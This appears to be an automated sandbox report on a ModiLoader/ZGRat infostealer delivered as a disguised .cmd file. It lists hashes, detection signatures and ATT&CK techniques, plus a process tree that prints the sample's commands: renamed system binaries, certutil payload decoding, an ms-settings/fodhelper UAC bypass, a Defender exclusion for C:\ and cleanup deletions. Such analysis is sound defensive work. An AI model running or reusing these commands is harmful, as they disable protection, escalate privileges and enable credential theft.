modiloader | 368c416ec45d094456b80562f6c91d3c1371f35ed70a329ac7b28a17d0cc6b99

Analysis

max time kernel
145s
max time network
105s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 12:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

doc023561361500.cmd
Size

4.9MB
MD5

d05bed0572c3ce597f3b4be7a2606c08
SHA1

f621468b397308f1055afaf2f27814a390eb16ea
SHA256

e84dd67c7831168c1d7a0f11a78d1e0497eb1cfa8689b25b291ee4b1b96826a4
SHA512

4fbe7a932d91882491648b489ec1e2c349ec71423c071e3f751c130e51ae62881473a9feaf3d842c60ed2fb6922b59f0b611491145e84b07e7145efb0ca7ec79
SSDEEP

24576:sYkuWvLHtSs/yfVZIC5z65HTGq42xfcJele9P2dxBJGhRC8Ih:sYkuWTcDXB65HPxfhleljIh

Score

10^/10

modiloader zgrat rat spyware stealer trojan

Malware Config

Signatures

Detect ZGRat V1 33 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3708-83-0x000000004C260000-0x000000004C2BC000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-85-0x000000004C870000-0x000000004C8CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-87-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-86-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-123-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-125-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-145-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-143-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-139-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-137-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-135-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-133-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-131-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-129-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-127-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-121-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-119-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-117-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-113-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-111-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-109-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-107-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-103-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-141-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-115-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-105-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-101-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-99-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-97-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-95-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-93-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-91-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1
behavioral2/memory/3708-89-0x000000004C870000-0x000000004C8C5000-memory.dmp	family_zgrat_v1

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

ModiLoader Second Stage 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3708-78-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/3708-81-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

per.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation per.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 26 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exeper.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exehuqnearJ.pif

pid	process
4380	alpha.exe
4772	alpha.exe
1560	alpha.exe
1636	alpha.exe
3836	kn.exe
3132	alpha.exe
3636	alpha.exe
1588	alpha.exe
2956	alpha.exe
4132	xkn.exe
3176	alpha.exe
2912	ger.exe
4912	alpha.exe
3100	kn.exe
1644	per.exe
592	alpha.exe
3104	Ping_c.pif
4932	alpha.exe
4240	alpha.exe
4608	alpha.exe
2948	alpha.exe
2284	alpha.exe
456	alpha.exe
3328	alpha.exe
1560	alpha.exe
3708	huqnearJ.pif

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

37 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

Ping_c.pif

description pid process target process

PID 3104 set thread context of 3708 3104 Ping_c.pif huqnearJ.pif
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1300 taskkill.exe

flow	ioc
37	ip-api.com

description	pid	process	target process
PID 3104 set thread context of 3708	3104	Ping_c.pif	huqnearJ.pif

pid	process
1300	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 35 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

xkn.exehuqnearJ.pif

pid process

4132 xkn.exe
4132 xkn.exe
3708 huqnearJ.pif
3708 huqnearJ.pif
3708 huqnearJ.pif
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exehuqnearJ.pif

description pid process

Token: SeDebugPrivilege 4132 xkn.exe
Token: SeDebugPrivilege 1300 taskkill.exe
Token: SeDebugPrivilege 3708 huqnearJ.pif

description	flow	ioc
HTTP User-Agent header	35	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
4132	xkn.exe
4132	xkn.exe
3708	huqnearJ.pif
3708	huqnearJ.pif
3708	huqnearJ.pif

description	pid	process
Token: SeDebugPrivilege	4132	xkn.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	3708	huqnearJ.pif

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exePing_c.pif

description	pid	process	target process
PID 2892 wrote to memory of 2576	2892	cmd.exe	extrac32.exe
PID 2892 wrote to memory of 2576	2892	cmd.exe	extrac32.exe
PID 2892 wrote to memory of 4380	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4380	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4772	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4772	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 1560	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 1560	2892	cmd.exe	alpha.exe
PID 1560 wrote to memory of 3328	1560	alpha.exe	extrac32.exe
PID 1560 wrote to memory of 3328	1560	alpha.exe	extrac32.exe
PID 2892 wrote to memory of 1636	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 1636	2892	cmd.exe	alpha.exe
PID 1636 wrote to memory of 3836	1636	alpha.exe	kn.exe
PID 1636 wrote to memory of 3836	1636	alpha.exe	kn.exe
PID 2892 wrote to memory of 3132	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 3132	2892	cmd.exe	alpha.exe
PID 3132 wrote to memory of 4496	3132	alpha.exe	extrac32.exe
PID 3132 wrote to memory of 4496	3132	alpha.exe	extrac32.exe
PID 2892 wrote to memory of 3636	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 3636	2892	cmd.exe	alpha.exe
PID 3636 wrote to memory of 2532	3636	alpha.exe	extrac32.exe
PID 3636 wrote to memory of 2532	3636	alpha.exe	extrac32.exe
PID 2892 wrote to memory of 1588	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 1588	2892	cmd.exe	alpha.exe
PID 1588 wrote to memory of 3512	1588	alpha.exe	extrac32.exe
PID 1588 wrote to memory of 3512	1588	alpha.exe	extrac32.exe
PID 2892 wrote to memory of 2956	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 2956	2892	cmd.exe	alpha.exe
PID 2956 wrote to memory of 4132	2956	alpha.exe	xkn.exe
PID 2956 wrote to memory of 4132	2956	alpha.exe	xkn.exe
PID 4132 wrote to memory of 3176	4132	xkn.exe	alpha.exe
PID 4132 wrote to memory of 3176	4132	xkn.exe	alpha.exe
PID 3176 wrote to memory of 2912	3176	alpha.exe	ger.exe
PID 3176 wrote to memory of 2912	3176	alpha.exe	ger.exe
PID 2892 wrote to memory of 4912	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4912	2892	cmd.exe	alpha.exe
PID 4912 wrote to memory of 3100	4912	alpha.exe	kn.exe
PID 4912 wrote to memory of 3100	4912	alpha.exe	kn.exe
PID 2892 wrote to memory of 1644	2892	cmd.exe	per.exe
PID 2892 wrote to memory of 1644	2892	cmd.exe	per.exe
PID 2892 wrote to memory of 592	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 592	2892	cmd.exe	alpha.exe
PID 592 wrote to memory of 1300	592	alpha.exe	taskkill.exe
PID 592 wrote to memory of 1300	592	alpha.exe	taskkill.exe
PID 2892 wrote to memory of 3104	2892	cmd.exe	Ping_c.pif
PID 2892 wrote to memory of 3104	2892	cmd.exe	Ping_c.pif
PID 2892 wrote to memory of 3104	2892	cmd.exe	Ping_c.pif
PID 2892 wrote to memory of 4932	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4932	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4240	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4240	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4608	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 4608	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 2948	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 2948	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 2284	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 2284	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 456	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 456	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 3328	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 3328	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 1560	2892	cmd.exe	alpha.exe
PID 2892 wrote to memory of 1560	2892	cmd.exe	alpha.exe
PID 3104 wrote to memory of 3708	3104	Ping_c.pif	huqnearJ.pif

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2892
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:2576
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:4772
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:3328
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
    3⤵
    - Executes dropped EXE
    PID:3836
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3132
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    PID:4496
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    PID:2532
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    PID:3512
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4132
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3176
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2912
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    3⤵
    - Executes dropped EXE
    PID:3100
- C:\Windows \System32\per.exe
  "C:\\Windows \\System32\\per.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1644
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:592
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1300
- C:\Users\Public\Libraries\Ping_c.pif
  C:\Users\Public\Libraries\Ping_c.pif
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3104
- - C:\Users\Public\Libraries\huqnearJ.pif
    C:\Users\Public\Libraries\huqnearJ.pif
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3708
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:4932
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:4240
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2284
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:456
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3328
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1560

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:4796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izvk32qf.zct.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\Ping_c.pif

Filesize
1.7MB

MD5
ba58a19a6475eff2c5bb9b6dfc7d9dd3

SHA1
407eda96d6cc766e17a6a27cf37cc63dd82537f3

SHA256
22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57

SHA512
6e53a2642c36cddc8cad22ca898c358d3393bd0a880fb5d364cb4aa38ef200b9b0b06dd03a13d05ef91e9867cb172eb2e05a021f0b28282028f8a1eaacdaf9e0

Download Submit
C:\Users\Public\Libraries\huqnearJ.pif

Filesize
66KB

MD5
c116d3604ceafe7057d77ff27552c215

SHA1
452b14432fb5758b46f2897aeccd89f7c82a727d

SHA256
7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

SHA512
9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
3.4MB

MD5
c5d58251c6989580fcf2b5d75ea57467

SHA1
1b5c775600d8aa1e247574a9ff8620a3c2e74347

SHA256
36df0e80ac34f848b1934565413598f7c2087a81e6e4bd69de10be2f86ed15ee

SHA512
9efdb53e6902716f1e4ee794dd1e315080817c6eb8045f8a2c62478fb05d8aae7d53b3a8595842f319f49c8075f7522341feea66a47b0f438690905e405c76fc

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/3104-75-0x0000000000400000-0x00000000005B9000-memory.dmp

Filesize
1.7MB

Download
memory/3708-129-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-113-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-83-0x000000004C260000-0x000000004C2BC000-memory.dmp

Filesize
368KB

Download
memory/3708-84-0x000000004C2C0000-0x000000004C864000-memory.dmp

Filesize
5.6MB

Download
memory/3708-85-0x000000004C870000-0x000000004C8CA000-memory.dmp

Filesize
360KB

Download
memory/3708-87-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-86-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-123-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-125-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-145-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-143-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-139-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-137-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-135-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-133-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-131-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-78-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/3708-127-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-121-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-119-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-117-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-81-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/3708-111-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-109-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-107-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-103-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-141-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-115-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-105-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-101-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-99-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-97-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-95-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-93-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-91-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-89-0x000000004C870000-0x000000004C8C5000-memory.dmp

Filesize
340KB

Download
memory/3708-1172-0x000000004CA00000-0x000000004CA66000-memory.dmp

Filesize
408KB

Download
memory/3708-1173-0x000000004DA30000-0x000000004DA80000-memory.dmp

Filesize
320KB

Download
memory/3708-1174-0x000000004DA80000-0x000000004DB1C000-memory.dmp

Filesize
624KB

Download
memory/3708-1177-0x000000004DBA0000-0x000000004DC32000-memory.dmp

Filesize
584KB

Download
